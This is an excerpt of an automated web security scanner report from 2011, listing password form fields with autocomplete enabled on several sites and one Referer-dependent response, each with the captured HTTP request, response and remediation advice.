Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

7.1. http://appointron.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://appointron.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.4.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "8879d27282002ca61af216ed66e18e8a"
X-Runtime: 1ms
Set-Cookie: _base_session=BAh7BzoMY3NyZl9pZCIlZjEzMjVhMzZlNjc0MGFkZjU1MDQyMTBiNzZhOTc5ZTQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--587a67a84dd30f49cd5d102ac1c3a7523ee2b049; domain=.appointron.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1977019555
Age: 0
Via: 1.1 varnish
Content-Length: 12153

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<td id='login_content_table_cell'>
<form action="/session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td>
<input class="noFocus" id="password" name="password" onkeypress="return submitenter(this,event)" style="font-size: 22px; width: 220px; border: 0px;" type="password" />
</td>
...[SNIP]...
7.2. http://appointron.com/users/new  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://appointron.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/new?plan_type_id=2 HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "e9d79718dce53d6411782b2bf1fdaae0"
X-Runtime: 5ms
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1233507530
Age: 0
Via: 1.1 varnish
Content-Length: 11968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<br/>
<form action="/users" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<br/>
       <input id="user_password" name="user[password]" size="30" type="password" />

       <label for="password_confirmation">
...[SNIP]...
<br/>
       <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />

<br/>
...[SNIP]...
7.3. http://bounce.adbrite.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bounce.adbrite.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: bounce.adbrite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:24:49 GMT
Server: Apache
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=1800
Age: 0
Expires: Sat, 09 Apr 2011 00:54:49 GMT
Content-Length: 12536
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>adBrite Exchange</title>
<meta http-equiv="Content-Type"
...[SNIP]...
<li>
<form action="https://www.adbrite.com/mb/commerce/login.php" id="sign_in_top_none" name="loginform" method="post" target="_top" class=" sign_in_top shadow" >
<input type="text" name="username" title="Username" id="top-username" />
<input type="password" name="pword" title="Password" id="top-pword" />
<a href="https://www.adbrite.com/mb/commerce/send_password_form.php" id="top-forgot_password">
...[SNIP]...
7.4. http://bounce.adbrite.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bounce.adbrite.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: bounce.adbrite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:24:49 GMT
Server: Apache
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=1800
Age: 0
Expires: Sat, 09 Apr 2011 00:54:49 GMT
Content-Length: 12536
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>adBrite Exchange</title>
<meta http-equiv="Content-Type"
...[SNIP]...
</ul>


<form action="https://www.adbrite.com/mb/commerce/login.php" id="sign_in_top_none" class="sign_in_top shadow" name="loginform" method="post" target="_top">
<input type="text" name="username" title="Username" id="top-username" /><input type="password" name="pword" title="Password" id="top-pword" />
<label for="view_select_adv">
...[SNIP]...
7.5. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<center><form name="frmLogin" id="frmLogin" style="display:inline;" method="post" action="splash.aspx">
<table border="0" cellspacing="3" cellpadding="0" style="width:100%;" width="border-collapse:collapse; " class="UPE-StandardTableSmaller">
...[SNIP]...
<input id="txtPasswordDisplay" class="UPE-InputText" style="vertical-align:middle;color:grey;" size="10" value="Password" onfocus="TogglePassword('enter');"><input type="password" name="txtPassword" id="txtPassword" style="vertical-align:middle;display: none;" class="UPE-InputText" size="10" maxlength="10" onblur="TogglePassword('complete');">&nbsp;&nbsp;<input type="Submit" value="Login" class="UPE-ButtonText" style="vertical-align:middle;" onclick="javascript: if (navigator.appName == 'Microsoft Internet Explorer') { if (navigator.cookieE
...[SNIP]...
7.6. https://www.google.com/accounts/NewAccount  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/NewAccount

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Date: Sat, 09 Apr 2011 00:21:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 71211

<html><head><title>Google Accounts</title>
<style type="text/css">
body {font-family: arial,sans-serif;}
.body {margin: 0 15px; }

div.errorbox-good {}

div.errorbox-bad {}


...[SNIP]...
</script>
<form action="https://www.google.com/accounts/CreateAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&amp;hl=en&amp;service=websiteoptimizer" method="POST" id="createaccount" name="createaccount" onsubmit="return(onPreCreateAccountSubmit());"> <input type="hidden" name="continue" value="https://www.google.com/analytics/siteopt/?et=reset&amp;hl=en">
...[SNIP]...
<div class="errorbox-good"><input type="password" name="Passwd" size="30" class="gaia sub passwdtxtfield" onkeyup="CreateRatePasswdReq(&#39;createaccount&#39;)">
</div>
...[SNIP]...
<div class="errorbox-good"><input type="password" name="PasswdAgain" size="30" class="gaia sub passwdtxtfield">
</div>
...[SNIP]...
7.7. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin?service=websiteoptimizer&hl=en&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_medium=et&utm_source=us-en-et-bizsol-0-biz1-all&utm_campaign=en HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GALX=QoTBtadx6jU;Path=/accounts;Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=service%3Dwebsiteoptimizer%26continue%3Dhttps%253A%252F%252Fwww.google.com%252Fanalytics%252Fsiteopt%252F%253Fet%253Dreset%2526hl%253Den
Date: Sat, 09 Apr 2011 00:17:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 43949

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr">
<style type="text/css"><!--
body,td,div,p,a,font,span {font-family:
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>
</td>
...[SNIP]...
7.8. http://www.wcax.com/global/PM/registration.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/PM/registration.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352695263:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
ntCoent-Length: 36961
Expires: Sat, 09 Apr 2011 12:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:38:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: EmailAddress=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: FirstName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: UserName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: REGISTRATION=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: SuppliedProfileFields=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Content-Length: 36961


<html>
<head id="Head1"><title>
   Create Account
</title><link href="mem.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="/global/interface/jq.js" type="text/javasc
...[SNIP]...
<div id="MainDiv">
<form name="form1" method="post" action="UserProfile.aspx?L=104054&amp;function=manageprofile&amp;mode=create&amp;referrer=http%3a%2f%2fwww.wcax.com%2fGlobal%2flink.asp%3fL%3d398823&amp;referrerDomain=www.wcax.com" id="form1" onsubmit="return Validate();">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkwMjU2NDE0NQ9kFgICAw9kFhACAQ8WAh4EVGV4dAXIATxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+CjwhLS0KdmF
...[SNIP]...
<br />
<input id="Password" type="password" maxLength="60" size="32" name="Password" value="" />
</td>
...[SNIP]...
<br />
<input id="VerifyPassword" type="password" maxLength="60" size="32" name="VerifyPassword" value="" />
</td>
...[SNIP]...
7.9. http://www.wcax.com/global/PM/registration.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/PM/registration.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /global/PM/registration.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823&referrerDomain=www.wcax.com HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352702175:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
ntCoent-Length: 6336
Expires: Sat, 09 Apr 2011 12:38:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:38:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: EmailAddress=; expires=Mon, 09-Apr-2001 12:38:28 GMT; path=/
Set-Cookie: FirstName=; expires=Mon, 09-Apr-2001 12:38:28 GMT; path=/
Set-Cookie: UserName=; expires=Mon, 09-Apr-2001 12:38:28 GMT; path=/
Set-Cookie: REGISTRATION=; expires=Mon, 09-Apr-2001 12:38:28 GMT; path=/
Set-Cookie: SuppliedProfileFields=; expires=Mon, 09-Apr-2001 12:38:28 GMT; path=/
Content-Length: 6336


<HTML>
   <head id="Head1"><title>
   Login
</title><link href="mem.css" type="text/css" rel="STYLESHEET" />
       <script language="JavaScript" src="memcommon.js?ver=20090220" type="text/javascript"></
...[SNIP]...
<div id="MainDiv">
           <form name="form1" method="post" action="Login.aspx?L=104054&amp;function=manageprofile&amp;mode=login&amp;referrer=http%3a%2f%2fwww.wcax.com%2fglobal%2flink.asp%3fL%3d104054%26function%3dmanageprofile%26mode%3dcreate%26referrer%3dhttp%253A%2f%2fwww.wcax.com%2fGlobal%2flink.asp%253FL%253D398823&amp;referrerDomain=www.wcax.com" id="form1" onsubmit="return Validate();">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5MzU4ODMxMTEPZBYCAgMPZBYEAgUPD2QWBB4FY2xhc3MFBGJvZHkeBXN0eWxlBRJmb250LXdlaWdodDogYm9sZDtkAgsPFgIeB1Zpc2libGVoZGTWhfTIea1ZJa4
...[SNIP]...
</span>
                        <input name="LoginPassword" type="password" id="LoginPassword" tabIndex="2" maxlength="60" size="25" />
                        </td>
...[SNIP]...
8. Referer-dependent response  previous  next
There are 11 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

8.1. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.yieldmanager.com
Path:   /imp

Request 1

GET /imp?Z=300x250&s=1209091&_salt=4049171621&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#]!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!$<u]Fa!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!$<u]Fa!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!$<u]Fa!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(X!!!!#<uw3o!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!$<u]Fa!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!$<u]Fa!#Q+^!!!!$<u]Fa!#Q+o!!!!$<u]Fa!#Q+p!!!!$<u]Fa!#Q,.!!!!$<u]Fa!#RY.!!!!$<u]Fa!#SCj!!!!$<u]Fa!#SCk!!!!$<u]Fa!#XA!!!!!$<u]Fa!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!$<u]Fa!#^Bo!!!!$<u]Fa!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!$<u]Fa!#a3k!!!!$<u]Fa!#aG>!!!!$<u]Fa!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!$<u]Fa!#eaO!!!!$<u]Fa!#f8c!!!!$<u]Fa!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!$<u]Fa!#g[h!!!!$<u]Fa!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!$<u]Fa!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!$<u]Fa!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!$<u]Fa!#usu!!!!$<u]Fa!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!$